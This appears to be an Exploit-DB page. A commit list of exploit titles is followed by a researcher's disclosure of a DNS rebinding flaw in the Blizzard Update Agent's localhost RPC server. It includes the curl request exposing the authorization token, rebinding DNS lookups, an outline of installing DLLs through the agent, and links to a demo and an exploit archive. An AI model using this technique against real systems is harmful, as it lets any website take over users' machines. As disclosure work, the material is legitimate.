ed0e1e4d44
1979 changes to exploits/shellcodes Couchdb 1.5.0 - 'uuids' Denial of Service Apache CouchDB 1.5.0 - 'uuids' Denial of Service Beyond Remote 2.2.5.3 - Denial of Service (PoC) udisks2 2.8.0 - Denial of Service (PoC) Termite 3.4 - Denial of Service (PoC) SoftX FTP Client 3.3 - Denial of Service (PoC) Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection Silverstripe CMS 3.0.2 - Multiple Vulnerabilities SilverStripe CMS 3.0.2 - Multiple Vulnerabilities Silverstripe CMS 2.4 - File Renaming Security Bypass SilverStripe CMS 2.4 - File Renaming Security Bypass Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload Silverstripe CMS 2.4.x - 'BackURL' Open Redirection SilverStripe CMS 2.4.x - 'BackURL' Open Redirection Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure Silverstripe CMS - Multiple HTML Injection Vulnerabilities SilverStripe CMS - Multiple HTML Injection Vulnerabilities Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation Monstra CMS before 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (2) Monstra CMS < 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (1) Navigate CMS 2.8 - Cross-Site Scripting Collectric CMU 1.0 - 'lang' SQL injection Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection LG SuperSign EZ CMS 2.5 - Remote Code Execution MyBB Visual Editor 1.8.18 - Cross-Site Scripting Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection RICOH Aficio MP 301 Printer - Cross-Site Scripting Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection RICOH MP C6003 Printer - Cross-Site Scripting Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes) Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
53 lines
No EOL
2.9 KiB
Text
53 lines
No EOL
2.9 KiB
Text
All blizzard games are installed alongside a shared tool called "Blizzard Update Agent", investor.activision.com claims they have "500 million monthly active users", who presumably all have this utility installed.
|
|
|
|
The agent utility creates an JSON RPC server listening on localhost port 1120, and accepts commands to install, uninstall, change settings, update and other maintenance related options. Blizzard use a custom authentication scheme to verify the rpc's are from a legitimate source, it looks like this:
|
|
|
|
$ curl -si http://localhost:1120/agent
|
|
HTTP/1.0 200 OK
|
|
Content-Length: 359
|
|
|
|
{
|
|
"pid" : 3140.000000,
|
|
"user_id" : "S-1-5-21-1613814707-140385463-2225822625-1000",
|
|
"user_name" : "S-1-5-21-1613814707-140385463-2225822625-1000",
|
|
"state" : 1004.000000,
|
|
"version" : "2.13.4.5955",
|
|
"region" : "us",
|
|
"type" : "retail",
|
|
"opt_in_feedback" : true,
|
|
"session" : "15409717072196133548",
|
|
"authorization" : "11A87920224BD1FB22AF5F868CA0E789"
|
|
}
|
|
|
|
This endpoint is permitted without authentication, but all other requests must have a valid "Authorization" header with the token in that response. As with all HTTP RPC schemes like this, a website can send requests to the daemon with XMLHttpRequest(), but I think the theory is they will be ignored because requests must prove they can read and write the authorization property.
|
|
|
|
I don't think this design will work because of an attack called "dns rebinding". Any website can simply create a dns name that they are authorized to communicate with, and then make it resolve to localhost.
|
|
|
|
To be clear, this means that *any* website can send privileged commands to the agent.
|
|
|
|
I have a domain I use for testing called rbndr.us, you can use this page to generate hostnames:
|
|
|
|
https://lock.cmpxchg8b.com/rebinder.html
|
|
|
|
Here I want to alternate between 127.0.0.1 and 199.241.29.227, so I use 7f000001.c7f11de3.rbndr.us:
|
|
|
|
$ host 7f000001.c7f11de3.rbndr.us
|
|
7f000001.c7f11de3.rbndr.us has address 127.0.0.1
|
|
$ host 7f000001.c7f11de3.rbndr.us
|
|
7f000001.c7f11de3.rbndr.us has address 199.241.29.227
|
|
$ host 7f000001.c7f11de3.rbndr.us
|
|
7f000001.c7f11de3.rbndr.us has address 127.0.0.1
|
|
|
|
Here you can see the resolution alternates between the two addresses I want (note that depending on caching it might take a while to switch, the TTL is set to minimum but some servers round up).
|
|
|
|
I just wait for the cached response to expire, and then POST commands to the server.
|
|
|
|
Exploitation would involve using network drives, or setting destination to "Downloads" and making the browser install dlls, datafiles, etc.
|
|
|
|
I made a very simple demo, I'm sure it's quite brittle, but hopefully you get the idea!
|
|
|
|
http://lock.cmpxchg8b.com/yah4od7N.html
|
|
|
|
See screenshot attached of how it's supposed to look.
|
|
|
|
Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43665.zip |